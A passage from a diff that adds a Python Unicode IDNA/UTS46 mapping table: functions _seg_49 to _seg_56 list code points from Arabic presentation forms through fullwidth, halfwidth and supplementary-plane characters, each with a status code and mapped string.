'M', 'طمم'), + (0xFD74, 'M', 'طمي'), + (0xFD75, 'M', 'عجم'), + (0xFD76, 'M', 'عمم'), + (0xFD78, 'M', 'عمى'), + (0xFD79, 'M', 'غمم'), + (0xFD7A, 'M', 'غمي'), + (0xFD7B, 'M', 'غمى'), + (0xFD7C, 'M', 'فخم'), + (0xFD7E, 'M', 'قمح'), + (0xFD7F, 'M', 'قمم'), + (0xFD80, 'M', 'لحم'), + (0xFD81, 'M', 'لحي'), + (0xFD82, 'M', 'لحى'), + (0xFD83, 'M', 'لجج'), + (0xFD85, 'M', 'لخم'), + (0xFD87, 'M', 'لمح'), + (0xFD89, 'M', 'محج'), + (0xFD8A, 'M', 'محم'), + (0xFD8B, 'M', 'محي'), + (0xFD8C, 'M', 'مجح'), + (0xFD8D, 'M', 'مجم'), + (0xFD8E, 'M', 'مخج'), + (0xFD8F, 'M', 'مخم'), + (0xFD90, 'X'), + (0xFD92, 'M', 'مجخ'), + (0xFD93, 'M', 'همج'), + (0xFD94, 'M', 'همم'), + (0xFD95, 'M', 'نحم'), + (0xFD96, 'M', 'نحى'), + (0xFD97, 'M', 'نجم'), + (0xFD99, 'M', 'نجى'), + (0xFD9A, 'M', 'نمي'), + (0xFD9B, 'M', 'نمى'), + (0xFD9C, 'M', 'يمم'), + (0xFD9E, 'M', 'بخي'), + (0xFD9F, 'M', 'تجي'), + (0xFDA0, 'M', 'تجى'), + (0xFDA1, 'M', 'تخي'), + (0xFDA2, 'M', 'تخى'), + (0xFDA3, 'M', 'تمي'), + (0xFDA4, 'M', 'تمى'), + (0xFDA5, 'M', 'جمي'), + (0xFDA6, 'M', 'جحى'), + ] + +def _seg_49() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFDA7, 'M', 'جمى'), + (0xFDA8, 'M', 'سخى'), + (0xFDA9, 'M', 'صحي'), + (0xFDAA, 'M', 'شحي'), + (0xFDAB, 'M', 'ضحي'), + (0xFDAC, 'M', 'لجي'), + (0xFDAD, 'M', 'لمي'), + (0xFDAE, 'M', 'يحي'), + (0xFDAF, 'M', 'يجي'), + (0xFDB0, 'M', 'يمي'), + (0xFDB1, 'M', 'ممي'), + (0xFDB2, 'M', 'قمي'), + (0xFDB3, 'M', 'نحي'), + (0xFDB4, 'M', 'قمح'), + (0xFDB5, 'M', 'لحم'), + (0xFDB6, 'M', 'عمي'), + (0xFDB7, 'M', 'كمي'), + (0xFDB8, 'M', 'نجح'), + (0xFDB9, 'M', 'مخي'), + (0xFDBA, 'M', 'لجم'), + (0xFDBB, 'M', 'كمم'), + (0xFDBC, 'M', 'لجم'), + (0xFDBD, 'M', 'نجح'), + (0xFDBE, 'M', 'جحي'), + (0xFDBF, 'M', 'حجي'), + (0xFDC0, 'M', 'مجي'), + (0xFDC1, 'M', 'فمي'), + (0xFDC2, 'M', 'بحي'), + (0xFDC3, 'M', 'كمم'), + (0xFDC4, 'M', 'عجم'), + (0xFDC5, 'M', 'صمم'), + (0xFDC6, 'M', 'سخي'), + (0xFDC7, 'M', 'نجي'), + (0xFDC8, 'X'), + (0xFDCF, 'V'), + (0xFDD0, 'X'), + (0xFDF0, 'M', 'صلے'), + (0xFDF1, 'M', 'قلے'), + (0xFDF2, 'M', 'الله'), + (0xFDF3, 'M', 'اكبر'), + (0xFDF4, 'M', 'محمد'), + (0xFDF5, 'M', 'صلعم'), + (0xFDF6, 'M', 'رسول'), + (0xFDF7, 'M', 'عليه'), + (0xFDF8, 'M', 'وسلم'), + (0xFDF9, 'M', 'صلى'), + (0xFDFA, '3', 'صلى الله عليه وسلم'), + (0xFDFB, '3', 'جل جلاله'), + (0xFDFC, 'M', 'ریال'), + (0xFDFD, 'V'), + (0xFE00, 'I'), + (0xFE10, '3', ','), + (0xFE11, 'M', '、'), + (0xFE12, 'X'), + (0xFE13, '3', ':'), + (0xFE14, '3', ';'), + (0xFE15, '3', '!'), + (0xFE16, '3', '?'), + (0xFE17, 'M', '〖'), + (0xFE18, 'M', '〗'), + (0xFE19, 'X'), + (0xFE20, 'V'), + (0xFE30, 'X'), + (0xFE31, 'M', '—'), + (0xFE32, 'M', '–'), + (0xFE33, '3', '_'), + (0xFE35, '3', '('), + (0xFE36, '3', ')'), + (0xFE37, '3', '{'), + (0xFE38, '3', '}'), + (0xFE39, 'M', '〔'), + (0xFE3A, 'M', '〕'), + (0xFE3B, 'M', '【'), + (0xFE3C, 'M', '】'), + (0xFE3D, 'M', '《'), + (0xFE3E, 'M', '》'), + (0xFE3F, 'M', '〈'), + (0xFE40, 'M', '〉'), + (0xFE41, 'M', '「'), + (0xFE42, 'M', '」'), + (0xFE43, 'M', '『'), + (0xFE44, 'M', '』'), + (0xFE45, 'V'), + (0xFE47, '3', '['), + (0xFE48, '3', ']'), + (0xFE49, '3', ' ̅'), + (0xFE4D, '3', '_'), + (0xFE50, '3', ','), + (0xFE51, 'M', '、'), + (0xFE52, 'X'), + (0xFE54, '3', ';'), + (0xFE55, '3', ':'), + (0xFE56, '3', '?'), + (0xFE57, '3', '!'), + (0xFE58, 'M', '—'), + (0xFE59, '3', '('), + (0xFE5A, '3', ')'), + (0xFE5B, '3', '{'), + (0xFE5C, '3', '}'), + (0xFE5D, 'M', '〔'), + ] + +def _seg_50() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFE5E, 'M', '〕'), + (0xFE5F, '3', '#'), + (0xFE60, '3', '&'), + (0xFE61, '3', '*'), + (0xFE62, '3', '+'), + (0xFE63, 'M', '-'), + (0xFE64, '3', '<'), + (0xFE65, '3', '>'), + (0xFE66, '3', '='), + (0xFE67, 'X'), + (0xFE68, '3', '\\'), + (0xFE69, '3', '$'), + (0xFE6A, '3', '%'), + (0xFE6B, '3', '@'), + (0xFE6C, 'X'), + (0xFE70, '3', ' ً'), + (0xFE71, 'M', 'ـً'), + (0xFE72, '3', ' ٌ'), + (0xFE73, 'V'), + (0xFE74, '3', ' ٍ'), + (0xFE75, 'X'), + (0xFE76, '3', ' َ'), + (0xFE77, 'M', 'ـَ'), + (0xFE78, '3', ' ُ'), + (0xFE79, 'M', 'ـُ'), + (0xFE7A, '3', ' ِ'), + (0xFE7B, 'M', 'ـِ'), + (0xFE7C, '3', ' ّ'), + (0xFE7D, 'M', 'ـّ'), + (0xFE7E, '3', ' ْ'), + (0xFE7F, 'M', 'ـْ'), + (0xFE80, 'M', 'ء'), + (0xFE81, 'M', 'آ'), + (0xFE83, 'M', 'أ'), + (0xFE85, 'M', 'ؤ'), + (0xFE87, 'M', 'إ'), + (0xFE89, 'M', 'ئ'), + (0xFE8D, 'M', 'ا'), + (0xFE8F, 'M', 'ب'), + (0xFE93, 'M', 'ة'), + (0xFE95, 'M', 'ت'), + (0xFE99, 'M', 'ث'), + (0xFE9D, 'M', 'ج'), + (0xFEA1, 'M', 'ح'), + (0xFEA5, 'M', 'خ'), + (0xFEA9, 'M', 'د'), + (0xFEAB, 'M', 'ذ'), + (0xFEAD, 'M', 'ر'), + (0xFEAF, 'M', 'ز'), + (0xFEB1, 'M', 'س'), + (0xFEB5, 'M', 'ش'), + (0xFEB9, 'M', 'ص'), + (0xFEBD, 'M', 'ض'), + (0xFEC1, 'M', 'ط'), + (0xFEC5, 'M', 'ظ'), + (0xFEC9, 'M', 'ع'), + (0xFECD, 'M', 'غ'), + (0xFED1, 'M', 'ف'), + (0xFED5, 'M', 'ق'), + (0xFED9, 'M', 'ك'), + (0xFEDD, 'M', 'ل'), + (0xFEE1, 'M', 'م'), + (0xFEE5, 'M', 'ن'), + (0xFEE9, 'M', 'ه'), + (0xFEED, 'M', 'و'), + (0xFEEF, 'M', 'ى'), + (0xFEF1, 'M', 'ي'), + (0xFEF5, 'M', 'لآ'), + (0xFEF7, 'M', 'لأ'), + (0xFEF9, 'M', 'لإ'), + (0xFEFB, 'M', 'لا'), + (0xFEFD, 'X'), + (0xFEFF, 'I'), + (0xFF00, 'X'), + (0xFF01, '3', '!'), + (0xFF02, '3', '"'), + (0xFF03, '3', '#'), + (0xFF04, '3', '$'), + (0xFF05, '3', '%'), + (0xFF06, '3', '&'), + (0xFF07, '3', '\''), + (0xFF08, '3', '('), + (0xFF09, '3', ')'), + (0xFF0A, '3', '*'), + (0xFF0B, '3', '+'), + (0xFF0C, '3', ','), + (0xFF0D, 'M', '-'), + (0xFF0E, 'M', '.'), + (0xFF0F, '3', '/'), + (0xFF10, 'M', '0'), + (0xFF11, 'M', '1'), + (0xFF12, 'M', '2'), + (0xFF13, 'M', '3'), + (0xFF14, 'M', '4'), + (0xFF15, 'M', '5'), + (0xFF16, 'M', '6'), + (0xFF17, 'M', '7'), + (0xFF18, 'M', '8'), + (0xFF19, 'M', '9'), + (0xFF1A, '3', ':'), + ] + +def _seg_51() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFF1B, '3', ';'), + (0xFF1C, '3', '<'), + (0xFF1D, '3', '='), + (0xFF1E, '3', '>'), + (0xFF1F, '3', '?'), + (0xFF20, '3', '@'), + (0xFF21, 'M', 'a'), + (0xFF22, 'M', 'b'), + (0xFF23, 'M', 'c'), + (0xFF24, 'M', 'd'), + (0xFF25, 'M', 'e'), + (0xFF26, 'M', 'f'), + (0xFF27, 'M', 'g'), + (0xFF28, 'M', 'h'), + (0xFF29, 'M', 'i'), + (0xFF2A, 'M', 'j'), + (0xFF2B, 'M', 'k'), + (0xFF2C, 'M', 'l'), + (0xFF2D, 'M', 'm'), + (0xFF2E, 'M', 'n'), + (0xFF2F, 'M', 'o'), + (0xFF30, 'M', 'p'), + (0xFF31, 'M', 'q'), + (0xFF32, 'M', 'r'), + (0xFF33, 'M', 's'), + (0xFF34, 'M', 't'), + (0xFF35, 'M', 'u'), + (0xFF36, 'M', 'v'), + (0xFF37, 'M', 'w'), + (0xFF38, 'M', 'x'), + (0xFF39, 'M', 'y'), + (0xFF3A, 'M', 'z'), + (0xFF3B, '3', '['), + (0xFF3C, '3', '\\'), + (0xFF3D, '3', ']'), + (0xFF3E, '3', '^'), + (0xFF3F, '3', '_'), + (0xFF40, '3', '`'), + (0xFF41, 'M', 'a'), + (0xFF42, 'M', 'b'), + (0xFF43, 'M', 'c'), + (0xFF44, 'M', 'd'), + (0xFF45, 'M', 'e'), + (0xFF46, 'M', 'f'), + (0xFF47, 'M', 'g'), + (0xFF48, 'M', 'h'), + (0xFF49, 'M', 'i'), + (0xFF4A, 'M', 'j'), + (0xFF4B, 'M', 'k'), + (0xFF4C, 'M', 'l'), + (0xFF4D, 'M', 'm'), + (0xFF4E, 'M', 'n'), + (0xFF4F, 'M', 'o'), + (0xFF50, 'M', 'p'), + (0xFF51, 'M', 'q'), + (0xFF52, 'M', 'r'), + (0xFF53, 'M', 's'), + (0xFF54, 'M', 't'), + (0xFF55, 'M', 'u'), + (0xFF56, 'M', 'v'), + (0xFF57, 'M', 'w'), + (0xFF58, 'M', 'x'), + (0xFF59, 'M', 'y'), + (0xFF5A, 'M', 'z'), + (0xFF5B, '3', '{'), + (0xFF5C, '3', '|'), + (0xFF5D, '3', '}'), + (0xFF5E, '3', '~'), + (0xFF5F, 'M', '⦅'), + (0xFF60, 'M', '⦆'), + (0xFF61, 'M', '.'), + (0xFF62, 'M', '「'), + (0xFF63, 'M', '」'), + (0xFF64, 'M', '、'), + (0xFF65, 'M', '・'), + (0xFF66, 'M', 'ヲ'), + (0xFF67, 'M', 'ァ'), + (0xFF68, 'M', 'ィ'), + (0xFF69, 'M', 'ゥ'), + (0xFF6A, 'M', 'ェ'), + (0xFF6B, 'M', 'ォ'), + (0xFF6C, 'M', 'ャ'), + (0xFF6D, 'M', 'ュ'), + (0xFF6E, 'M', 'ョ'), + (0xFF6F, 'M', 'ッ'), + (0xFF70, 'M', 'ー'), + (0xFF71, 'M', 'ア'), + (0xFF72, 'M', 'イ'), + (0xFF73, 'M', 'ウ'), + (0xFF74, 'M', 'エ'), + (0xFF75, 'M', 'オ'), + (0xFF76, 'M', 'カ'), + (0xFF77, 'M', 'キ'), + (0xFF78, 'M', 'ク'), + (0xFF79, 'M', 'ケ'), + (0xFF7A, 'M', 'コ'), + (0xFF7B, 'M', 'サ'), + (0xFF7C, 'M', 'シ'), + (0xFF7D, 'M', 'ス'), + (0xFF7E, 'M', 'セ'), + ] + +def _seg_52() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFF7F, 'M', 'ソ'), + (0xFF80, 'M', 'タ'), + (0xFF81, 'M', 'チ'), + (0xFF82, 'M', 'ツ'), + (0xFF83, 'M', 'テ'), + (0xFF84, 'M', 'ト'), + (0xFF85, 'M', 'ナ'), + (0xFF86, 'M', 'ニ'), + (0xFF87, 'M', 'ヌ'), + (0xFF88, 'M', 'ネ'), + (0xFF89, 'M', 'ノ'), + (0xFF8A, 'M', 'ハ'), + (0xFF8B, 'M', 'ヒ'), + (0xFF8C, 'M', 'フ'), + (0xFF8D, 'M', 'ヘ'), + (0xFF8E, 'M', 'ホ'), + (0xFF8F, 'M', 'マ'), + (0xFF90, 'M', 'ミ'), + (0xFF91, 'M', 'ム'), + (0xFF92, 'M', 'メ'), + (0xFF93, 'M', 'モ'), + (0xFF94, 'M', 'ヤ'), + (0xFF95, 'M', 'ユ'), + (0xFF96, 'M', 'ヨ'), + (0xFF97, 'M', 'ラ'), + (0xFF98, 'M', 'リ'), + (0xFF99, 'M', 'ル'), + (0xFF9A, 'M', 'レ'), + (0xFF9B, 'M', 'ロ'), + (0xFF9C, 'M', 'ワ'), + (0xFF9D, 'M', 'ン'), + (0xFF9E, 'M', '゙'), + (0xFF9F, 'M', '゚'), + (0xFFA0, 'X'), + (0xFFA1, 'M', 'ᄀ'), + (0xFFA2, 'M', 'ᄁ'), + (0xFFA3, 'M', 'ᆪ'), + (0xFFA4, 'M', 'ᄂ'), + (0xFFA5, 'M', 'ᆬ'), + (0xFFA6, 'M', 'ᆭ'), + (0xFFA7, 'M', 'ᄃ'), + (0xFFA8, 'M', 'ᄄ'), + (0xFFA9, 'M', 'ᄅ'), + (0xFFAA, 'M', 'ᆰ'), + (0xFFAB, 'M', 'ᆱ'), + (0xFFAC, 'M', 'ᆲ'), + (0xFFAD, 'M', 'ᆳ'), + (0xFFAE, 'M', 'ᆴ'), + (0xFFAF, 'M', 'ᆵ'), + (0xFFB0, 'M', 'ᄚ'), + (0xFFB1, 'M', 'ᄆ'), + (0xFFB2, 'M', 'ᄇ'), + (0xFFB3, 'M', 'ᄈ'), + (0xFFB4, 'M', 'ᄡ'), + (0xFFB5, 'M', 'ᄉ'), + (0xFFB6, 'M', 'ᄊ'), + (0xFFB7, 'M', 'ᄋ'), + (0xFFB8, 'M', 'ᄌ'), + (0xFFB9, 'M', 'ᄍ'), + (0xFFBA, 'M', 'ᄎ'), + (0xFFBB, 'M', 'ᄏ'), + (0xFFBC, 'M', 'ᄐ'), + (0xFFBD, 'M', 'ᄑ'), + (0xFFBE, 'M', 'ᄒ'), + (0xFFBF, 'X'), + (0xFFC2, 'M', 'ᅡ'), + (0xFFC3, 'M', 'ᅢ'), + (0xFFC4, 'M', 'ᅣ'), + (0xFFC5, 'M', 'ᅤ'), + (0xFFC6, 'M', 'ᅥ'), + (0xFFC7, 'M', 'ᅦ'), + (0xFFC8, 'X'), + (0xFFCA, 'M', 'ᅧ'), + (0xFFCB, 'M', 'ᅨ'), + (0xFFCC, 'M', 'ᅩ'), + (0xFFCD, 'M', 'ᅪ'), + (0xFFCE, 'M', 'ᅫ'), + (0xFFCF, 'M', 'ᅬ'), + (0xFFD0, 'X'), + (0xFFD2, 'M', 'ᅭ'), + (0xFFD3, 'M', 'ᅮ'), + (0xFFD4, 'M', 'ᅯ'), + (0xFFD5, 'M', 'ᅰ'), + (0xFFD6, 'M', 'ᅱ'), + (0xFFD7, 'M', 'ᅲ'), + (0xFFD8, 'X'), + (0xFFDA, 'M', 'ᅳ'), + (0xFFDB, 'M', 'ᅴ'), + (0xFFDC, 'M', 'ᅵ'), + (0xFFDD, 'X'), + (0xFFE0, 'M', '¢'), + (0xFFE1, 'M', '£'), + (0xFFE2, 'M', '¬'), + (0xFFE3, '3', ' ̄'), + (0xFFE4, 'M', '¦'), + (0xFFE5, 'M', '¥'), + (0xFFE6, 'M', '₩'), + (0xFFE7, 'X'), + (0xFFE8, 'M', '│'), + (0xFFE9, 'M', '←'), + ] + +def _seg_53() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFFEA, 'M', '↑'), + (0xFFEB, 'M', '→'), + (0xFFEC, 'M', '↓'), + (0xFFED, 'M', '■'), + (0xFFEE, 'M', '○'), + (0xFFEF, 'X'), + (0x10000, 'V'), + (0x1000C, 'X'), + (0x1000D, 'V'), + (0x10027, 'X'), + (0x10028, 'V'), + (0x1003B, 'X'), + (0x1003C, 'V'), + (0x1003E, 'X'), + (0x1003F, 'V'), + (0x1004E, 'X'), + (0x10050, 'V'), + (0x1005E, 'X'), + (0x10080, 'V'), + (0x100FB, 'X'), + (0x10100, 'V'), + (0x10103, 'X'), + (0x10107, 'V'), + (0x10134, 'X'), + (0x10137, 'V'), + (0x1018F, 'X'), + (0x10190, 'V'), + (0x1019D, 'X'), + (0x101A0, 'V'), + (0x101A1, 'X'), + (0x101D0, 'V'), + (0x101FE, 'X'), + (0x10280, 'V'), + (0x1029D, 'X'), + (0x102A0, 'V'), + (0x102D1, 'X'), + (0x102E0, 'V'), + (0x102FC, 'X'), + (0x10300, 'V'), + (0x10324, 'X'), + (0x1032D, 'V'), + (0x1034B, 'X'), + (0x10350, 'V'), + (0x1037B, 'X'), + (0x10380, 'V'), + (0x1039E, 'X'), + (0x1039F, 'V'), + (0x103C4, 'X'), + (0x103C8, 'V'), + (0x103D6, 'X'), + (0x10400, 'M', '𐐨'), + (0x10401, 'M', '𐐩'), + (0x10402, 'M', '𐐪'), + (0x10403, 'M', '𐐫'), + (0x10404, 'M', '𐐬'), + (0x10405, 'M', '𐐭'), + (0x10406, 'M', '𐐮'), + (0x10407, 'M', '𐐯'), + (0x10408, 'M', '𐐰'), + (0x10409, 'M', '𐐱'), + (0x1040A, 'M', '𐐲'), + (0x1040B, 'M', '𐐳'), + (0x1040C, 'M', '𐐴'), + (0x1040D, 'M', '𐐵'), + (0x1040E, 'M', '𐐶'), + (0x1040F, 'M', '𐐷'), + (0x10410, 'M', '𐐸'), + (0x10411, 'M', '𐐹'), + (0x10412, 'M', '𐐺'), + (0x10413, 'M', '𐐻'), + (0x10414, 'M', '𐐼'), + (0x10415, 'M', '𐐽'), + (0x10416, 'M', '𐐾'), + (0x10417, 'M', '𐐿'), + (0x10418, 'M', '𐑀'), + (0x10419, 'M', '𐑁'), + (0x1041A, 'M', '𐑂'), + (0x1041B, 'M', '𐑃'), + (0x1041C, 'M', '𐑄'), + (0x1041D, 'M', '𐑅'), + (0x1041E, 'M', '𐑆'), + (0x1041F, 'M', '𐑇'), + (0x10420, 'M', '𐑈'), + (0x10421, 'M', '𐑉'), + (0x10422, 'M', '𐑊'), + (0x10423, 'M', '𐑋'), + (0x10424, 'M', '𐑌'), + (0x10425, 'M', '𐑍'), + (0x10426, 'M', '𐑎'), + (0x10427, 'M', '𐑏'), + (0x10428, 'V'), + (0x1049E, 'X'), + (0x104A0, 'V'), + (0x104AA, 'X'), + (0x104B0, 'M', '𐓘'), + (0x104B1, 'M', '𐓙'), + (0x104B2, 'M', '𐓚'), + (0x104B3, 'M', '𐓛'), + (0x104B4, 'M', '𐓜'), + (0x104B5, 'M', '𐓝'), + ] + +def _seg_54() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x104B6, 'M', '𐓞'), + (0x104B7, 'M', '𐓟'), + (0x104B8, 'M', '𐓠'), + (0x104B9, 'M', '𐓡'), + (0x104BA, 'M', '𐓢'), + (0x104BB, 'M', '𐓣'), + (0x104BC, 'M', '𐓤'), + (0x104BD, 'M', '𐓥'), + (0x104BE, 'M', '𐓦'), + (0x104BF, 'M', '𐓧'), + (0x104C0, 'M', '𐓨'), + (0x104C1, 'M', '𐓩'), + (0x104C2, 'M', '𐓪'), + (0x104C3, 'M', '𐓫'), + (0x104C4, 'M', '𐓬'), + (0x104C5, 'M', '𐓭'), + (0x104C6, 'M', '𐓮'), + (0x104C7, 'M', '𐓯'), + (0x104C8, 'M', '𐓰'), + (0x104C9, 'M', '𐓱'), + (0x104CA, 'M', '𐓲'), + (0x104CB, 'M', '𐓳'), + (0x104CC, 'M', '𐓴'), + (0x104CD, 'M', '𐓵'), + (0x104CE, 'M', '𐓶'), + (0x104CF, 'M', '𐓷'), + (0x104D0, 'M', '𐓸'), + (0x104D1, 'M', '𐓹'), + (0x104D2, 'M', '𐓺'), + (0x104D3, 'M', '𐓻'), + (0x104D4, 'X'), + (0x104D8, 'V'), + (0x104FC, 'X'), + (0x10500, 'V'), + (0x10528, 'X'), + (0x10530, 'V'), + (0x10564, 'X'), + (0x1056F, 'V'), + (0x10570, 'M', '𐖗'), + (0x10571, 'M', '𐖘'), + (0x10572, 'M', '𐖙'), + (0x10573, 'M', '𐖚'), + (0x10574, 'M', '𐖛'), + (0x10575, 'M', '𐖜'), + (0x10576, 'M', '𐖝'), + (0x10577, 'M', '𐖞'), + (0x10578, 'M', '𐖟'), + (0x10579, 'M', '𐖠'), + (0x1057A, 'M', '𐖡'), + (0x1057B, 'X'), + (0x1057C, 'M', '𐖣'), + (0x1057D, 'M', '𐖤'), + (0x1057E, 'M', '𐖥'), + (0x1057F, 'M', '𐖦'), + (0x10580, 'M', '𐖧'), + (0x10581, 'M', '𐖨'), + (0x10582, 'M', '𐖩'), + (0x10583, 'M', '𐖪'), + (0x10584, 'M', '𐖫'), + (0x10585, 'M', '𐖬'), + (0x10586, 'M', '𐖭'), + (0x10587, 'M', '𐖮'), + (0x10588, 'M', '𐖯'), + (0x10589, 'M', '𐖰'), + (0x1058A, 'M', '𐖱'), + (0x1058B, 'X'), + (0x1058C, 'M', '𐖳'), + (0x1058D, 'M', '𐖴'), + (0x1058E, 'M', '𐖵'), + (0x1058F, 'M', '𐖶'), + (0x10590, 'M', '𐖷'), + (0x10591, 'M', '𐖸'), + (0x10592, 'M', '𐖹'), + (0x10593, 'X'), + (0x10594, 'M', '𐖻'), + (0x10595, 'M', '𐖼'), + (0x10596, 'X'), + (0x10597, 'V'), + (0x105A2, 'X'), + (0x105A3, 'V'), + (0x105B2, 'X'), + (0x105B3, 'V'), + (0x105BA, 'X'), + (0x105BB, 'V'), + (0x105BD, 'X'), + (0x10600, 'V'), + (0x10737, 'X'), + (0x10740, 'V'), + (0x10756, 'X'), + (0x10760, 'V'), + (0x10768, 'X'), + (0x10780, 'V'), + (0x10781, 'M', 'ː'), + (0x10782, 'M', 'ˑ'), + (0x10783, 'M', 'æ'), + (0x10784, 'M', 'ʙ'), + (0x10785, 'M', 'ɓ'), + (0x10786, 'X'), + (0x10787, 'M', 'ʣ'), + (0x10788, 'M', 'ꭦ'), + ] + +def _seg_55() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x10789, 'M', 'ʥ'), + (0x1078A, 'M', 'ʤ'), + (0x1078B, 'M', 'ɖ'), + (0x1078C, 'M', 'ɗ'), + (0x1078D, 'M', 'ᶑ'), + (0x1078E, 'M', 'ɘ'), + (0x1078F, 'M', 'ɞ'), + (0x10790, 'M', 'ʩ'), + (0x10791, 'M', 'ɤ'), + (0x10792, 'M', 'ɢ'), + (0x10793, 'M', 'ɠ'), + (0x10794, 'M', 'ʛ'), + (0x10795, 'M', 'ħ'), + (0x10796, 'M', 'ʜ'), + (0x10797, 'M', 'ɧ'), + (0x10798, 'M', 'ʄ'), + (0x10799, 'M', 'ʪ'), + (0x1079A, 'M', 'ʫ'), + (0x1079B, 'M', 'ɬ'), + (0x1079C, 'M', '𝼄'), + (0x1079D, 'M', 'ꞎ'), + (0x1079E, 'M', 'ɮ'), + (0x1079F, 'M', '𝼅'), + (0x107A0, 'M', 'ʎ'), + (0x107A1, 'M', '𝼆'), + (0x107A2, 'M', 'ø'), + (0x107A3, 'M', 'ɶ'), + (0x107A4, 'M', 'ɷ'), + (0x107A5, 'M', 'q'), + (0x107A6, 'M', 'ɺ'), + (0x107A7, 'M', '𝼈'), + (0x107A8, 'M', 'ɽ'), + (0x107A9, 'M', 'ɾ'), + (0x107AA, 'M', 'ʀ'), + (0x107AB, 'M', 'ʨ'), + (0x107AC, 'M', 'ʦ'), + (0x107AD, 'M', 'ꭧ'), + (0x107AE, 'M', 'ʧ'), + (0x107AF, 'M', 'ʈ'), + (0x107B0, 'M', 'ⱱ'), + (0x107B1, 'X'), + (0x107B2, 'M', 'ʏ'), + (0x107B3, 'M', 'ʡ'), + (0x107B4, 'M', 'ʢ'), + (0x107B5, 'M', 'ʘ'), + (0x107B6, 'M', 'ǀ'), + (0x107B7, 'M', 'ǁ'), + (0x107B8, 'M', 'ǂ'), + (0x107B9, 'M', '𝼊'), + (0x107BA, 'M', '𝼞'), + (0x107BB, 'X'), + (0x10800, 'V'), + (0x10806, 'X'), + (0x10808, 'V'), + (0x10809, 'X'), + (0x1080A, 'V'), + (0x10836, 'X'), + (0x10837, 'V'), + (0x10839, 'X'), + (0x1083C, 'V'), + (0x1083D, 'X'), + (0x1083F, 'V'), + (0x10856, 'X'), + (0x10857, 'V'), + (0x1089F, 'X'), + (0x108A7, 'V'), + (0x108B0, 'X'), + (0x108E0, 'V'), + (0x108F3, 'X'), + (0x108F4, 'V'), + (0x108F6, 'X'), + (0x108FB, 'V'), + (0x1091C, 'X'), + (0x1091F, 'V'), + (0x1093A, 'X'), + (0x1093F, 'V'), + (0x10940, 'X'), + (0x10980, 'V'), + (0x109B8, 'X'), + (0x109BC, 'V'), + (0x109D0, 'X'), + (0x109D2, 'V'), + (0x10A04, 'X'), + (0x10A05, 'V'), + (0x10A07, 'X'), + (0x10A0C, 'V'), + (0x10A14, 'X'), + (0x10A15, 'V'), + (0x10A18, 'X'), + (0x10A19, 'V'), + (0x10A36, 'X'), + (0x10A38, 'V'), + (0x10A3B, 'X'), + (0x10A3F, 'V'), + (0x10A49, 'X'), + (0x10A50, 'V'), + (0x10A59, 'X'), + (0x10A60, 'V'), + (0x10AA0, 'X'), + (0x10AC0, 'V'), + ] + +def _seg_56() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x10AE7, 'X'), + (0x10AEB, 'V'), + (0x10AF7, 'X'), + (0x10B00, 'V'), + (0x10B36, 'X'), + (0x10B39, 'V'), + (0x10B56, 'X'), + (0x10B58, 'V'), + (0x10B73, 'X'), + (0x10B78, 'V'), + (0x10B92, 'X'), + (0x10B99, 'V'), + (0x10B9D, 'X'), + (0x10BA9, 'V'), + (0x10BB0, 'X'), + (0x10C00, 'V'), + (0x10C49, 'X'), + (0x10C80, 'M', '𐳀'), + (0x10C81, 'M', '𐳁'), + (0x10C82, 'M', '𐳂'), + (0x10C83, 'M', '𐳃'), + (0x10C84, 'M', '𐳄'), + (0x10C85, 'M', '𐳅'), + (0x10C86, 'M', '𐳆'), + (0x10C87, 'M', '𐳇'), + (0x10C88, 'M', '𐳈'), + (0x10C89, 'M', '𐳉'), + (0x10C8A, 'M', '𐳊'), + (0x10C8B, 'M', '𐳋'), + (0x10C8C, 'M', '𐳌'), + (0x10C8D, 'M', '𐳍'), + (0x10C8E, 'M', '𐳎'), + (0x10C8F, 'M', '𐳏'), + (0x10C90, 'M', '𐳐'), + (0x10C91, 'M', '𐳑'), + (0x10C92, 'M', '𐳒'), + (0x10C93, 'M', '𐳓'), + (0x10C94, 'M', '𐳔'), + (0x10C95, 'M', '𐳕'), + (0x10C96, 'M', '𐳖'), + (0x10C97, 'M', '𐳗'), + (0x10C98, 'M', '𐳘'), + (0x10C99, 'M', '𐳙'), + (0x10C9A, 'M', '𐳚'), + (0x10C9B, 'M', '𐳛'), + (0x10C9C, 'M', '𐳜'), + (0x10C9D, 'M', '𐳝'), + (0x10C9E, 'M', '𐳞'), + (0x10C9F, 'M', '𐳟'), + (0x10CA0, 'M', '𐳠'), + (0x10CA1, 'M', '𐳡'), + (0x10CA2, 'M', '𐳢'), + (0x10CA3, 'M', '𐳣'), + (0x10CA4, 'M', '𐳤'), + (0x10CA5, 'M', '𐳥'), + (0x10CA6, 'M', '𐳦'), + (0x10CA7, 'M', '𐳧'), + (0x10CA8, 'M', '𐳨'), + (0x10CA9, 'M', '𐳩'), + (0x10CAA, 'M', '𐳪'), + (0x10CAB, 'M', '𐳫'), + (0x10CAC, 'M', '𐳬'), + (0x10CAD, 'M', '𐳭'), + (0x10CAE, 'M', '𐳮'), + (0x10CAF, 'M', '𐳯'), + (0x10CB0, 'M', '𐳰'), + (0x10CB1, 'M', '𐳱'), + (0x10CB2, 'M', '𐳲'), + (0x10CB3, 'X'), + (0x10CC0, 'V'), + (0x10CF3, 'X'), + (0x10CFA, 'V'), + (0x10D28, 'X'), + (0x10D30, 'V'), + (0x10D3A, 'X'), + (0x10E60, 'V'), + (0x10E7F, 'X'), + (0x10E80, 'V'), + (0x10EAA, 'X'), + (0x10EAB, 'V'), + (0x10EAE, 'X'), + (0x10EB0, 'V'), + (0x10EB2, 'X'), + (0x10F00, 'V'), + (0x10F28, 'X'), + (0x10F30, 'V'), + (0x10F5A, 'X'), + (0x10F70, 'V'), + (0x10F8A, 'X'), + (0x10FB0, 'V'), + (0x10FCC, 'X'), + (0x10FE0, 'V'), + (0x10FF7, 'X'), + (0x11000, 'V'), + (0x1104E, 'X'), + (0x11052, 'V'), + (0x11076, 'X'), + (0x1107F, 'V'), + (0x110BD, 'X'), + (0x110BE, 'V'), + ] + +def _seg_57() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return 